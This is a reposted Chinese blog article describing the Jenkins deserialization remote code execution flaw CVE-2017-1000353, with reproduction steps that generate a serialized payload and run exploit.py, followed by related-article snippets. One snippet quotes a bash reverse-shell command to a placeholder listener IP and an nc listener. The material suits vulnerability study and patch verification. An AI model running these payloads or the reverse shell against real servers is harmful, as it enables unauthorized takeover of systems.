Jenkins远程代码执行漏洞检查(CVE-2017-1000353)

最新推荐文章于 2025-06-08 18:46:48 发布
转载 最新推荐文章于 2025-06-08 18:46:48 发布 · 304 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/backlion/p/6813260.html

本文介绍Jenkins中存在的一种反序列化漏洞,攻击者利用此漏洞可在未授权的情况下执行任意代码。漏洞影响所有Jenkins主版本(<=2.56)及LTS版本(<=2.46.1)。文章提供了详细的测试步骤,并指出该漏洞在Linux环境下有效。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限

漏洞影响范围:

所有Jenkins主版本均受到影响(包括<=2.56版本)
所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)

测试步骤:

1.下载生成反序列的payload:

https://github.com/nobleXu/jenkins

2.生成一个jenkins_poc1.ser反序列文件

java  -jar  jenkins_payload.jar  jenkins_poc1.ser  "ping www.baidu.com"

3.下载jenkins.py文件:

下载链接: https://pan.baidu.com/s/1misPilU 密码: 6qqh

4.编辑jenkins.py文件,修改url地址:

 

5.执行jenkins.py:

python3  exploit.py

6.通过dnslog可以看到反序列请求日志记录:

 

 测试总结:

Jenkins运行环境是在linux下,win环境利用不成功

参考文献:

https://github.com/phith0n/vulhub/tree/master/jenkins/CVE-2017-1000353

https://blogs.securiteam.com/index.php/archives/3171

https://xianzhi.aliyun.com/forum/read/1567.html

转载于:https://www.cnblogs.com/backlion/p/6813260.html

Jenkins-CI 远程代码执行漏洞CVE-2017-1000353
不忘初心,护天下安全!
10-19 1078
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。
Jenkins-CI 远程代码执行漏洞复现(CVE-2017-1000353
墨痕诉清风的博客
11-06 917
(https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar),这是生成POC的工具。下载[exploit.py](https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py)参考阅读 https://blogs.securiteam.com/index.php/archives/3171。.
CVE-2017-1000353源码分析与漏洞复现(Jenkins 远程代码执行)
最新发布
spinage的博客
06-08 1039
CVE-2017-1000353是一个影响Jenkins(≤2.56/LTS≤2.46.1)的高危反序列化漏洞(CVSS 9.8)。该漏洞源于Jenkins CLI接口未授权访问缺陷及不安全的序列化机制,攻击者通过构造恶意SignedObject绕过黑名单,通过HTTP双向通信通道触发任意命令执行。 技术关键点包括: CLIAction类允许匿名访问/cli接口 CliEndpointResponse处理双向通道时未验证数据合法性 Channel类反序列化恶意命令对象时执行系统命令
Jenkins远程代码执行漏洞CVE-2017-1000353
公众号shadow sock7
01-31 3133
复现环境: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353 复现 使用Intellij Idea打包java为可执行jar包参考: https://blog.youkuaiyun.com/xuemengrui12/article/details/74984731 ...
jenkins java反序列化_Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)
weixin_31308407的博客
02-13 280
Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)一、漏洞描述该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。二、漏洞影响版本所有jenkins主版本均受到影响(包括<=2.56版本)所有的jenkins LTS均受到影响(包括&lt...
Jenkins反序列化漏洞cve-2017-1000353
weixin_30593443的博客
12-13 501
一、漏洞原理: 本地没有环境:参考:https://blogs.securiteam.com/index.php/archives/3171 进行学习理解记录。 首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。 攻击过程学习: 下文的session是一个uuid,类型4 1 #可以如下生成 2 session = uuid....
漏洞复现】Jenkins-CI远程代码执行漏洞(CVE-2017-1000353
weixin_43486390的博客
12-18 1077
0x01 漏洞描述 Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。远程攻击者可利用漏洞在受影响的应用程序的上下文中执行任意代码,或造成程序拒绝服务。 0x02 影响范围 所有Jenkins主版本均受到影响(包括<=2.56版本) 所有Jenkins LTS 均受到影响( 包括<=2.46.1
jenkins漏洞复现】CVE-2017-1000353远程代码执行漏洞+CVE-2018-1000861未授权弱口令用户可执行任意命令
serendipity1130的博客
08-31 1060
CVE-2017-1000353 1.扫描开放了8080端口,访问8080端口: 2、执行下面命令,生成字节码文件: java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success" 3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令 4、修改exploit.py,把proxies里面的内容注释掉 6、执行如下
Jenkins漏洞CVE-2017-1000353)复现
qq_62056583的博客
07-05 1106
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限。网上查找相关资料显示,漏洞经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。查看tmp目录下是否成功生成,但我的虚拟机中并没有生成相应的数据包,或者说是我的Java环境出的问题(该项实验目前还没成功实现)对生成的字节码文件进行发送,使用预备知识第二条指令。
vulfocus靶场jenkins代码执行漏洞cve-1027-1000353
没有故事
04-23 490
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,上一步生成的base64编码}|{base64,-d}|{bash,-i}"python3 exploit.py http://受害者IP:端口 jenkins_poc.ser。bash -i >& /dev/tcp/监听机的IP/端口 0>&1。攻击机监听: nc -lvp 4444。GitCode - 开发者的代码家园。
Jenkins-CI远程代码执行漏洞复现(CVE-2017-1000353)
baidu_38844729的博客
06-19 1430
漏洞分析 漏洞描述: Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。远程攻击者可利用漏洞在受影响的应用程序的上下文中执行任意代码,或造成程序拒绝服务。 影响版本: Jenkins <= 2.56 Jenkins LTS <= 2.46.1 漏洞复现 使用vulhub复现 一、启动jenkins 2
Jenkins 远程代码执行漏洞CVE-2017-1000353) 复现
YouthBelief的博客
11-25 5783
所有文章,仅供安全研究与学习之用,后果自负! Jenkins 远程代码执行漏洞CVE-2017-1000353Jenkins 远程代码执行漏洞CVE-2017-1000353)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Jenkins 远程代码执行漏洞CVE-2017-1000353) 0x01 漏洞描述 Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交
jenkins 反序列化漏洞 cve-2017-1000353
whatday的专栏
06-13 1579
一、漏洞原理: 首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。 攻击过程学习: 下文的session是一个uuid,类型4 # 可以如下生成 session = uuid.uuid4() 1、首先要发送一个请求,是一个下载请求。这个请求是要启动一个双向数据传输频道。频道的标识就是session。而side字段则是用来标识传输方向 对应代码段: def Download(url,session): headers = {'Si
jenkins 代码执行CVE-2017-1000353
qq_23003811的博客
07-16 282
Jenkins未授权远程代码执行漏洞, 允许攻击者将序列化的Java SignedObject对象传输给Jenkins CLI处理,反序列化ObjectInputStream作为Command对象,这将绕过基于黑名单的保护机制, 导致代码执行。2、在桌面打开cmd窗口,生成ser二进制利用文件,本机环境为win10,在桌面上生成了jenkins_poc.ser。3、在桌面打开cmd窗口执行,发送数据包能,发送成功说明存在漏洞。3、在桌面打开cmd窗口,生成ser二进制利用文件poc.ser。
Jenkins漏洞利用复现-CVE-2017-1000353
Xor0ne
08-01 1401
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。 Jenkins功能包括: 1、持续的软件版本发布/测试项目。 2、监控外部调用执行的工作。 文章目录1、漏洞描述及环境2、漏洞复现2.1、工具下载2.2、工具利用2.3、检验参考链接: 1、漏洞描述及环境 环境名称: vulfocus/jenkins-cve_2017_1000353 官方复现教程: https://vulhub.org/#/env
jenkins 远程代码执行CVE-2019-100300
04-02
CVE-2019-1003000 是 Jenkins 中因 Script Security 插件沙盒绕过导致的远程代码执行漏洞。攻击者可构造恶意请求绕过 Groovy 沙盒保护,在未授权或低权限情况下执行任意代码[^1]。此漏洞实际包含三个关联 CVE- **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值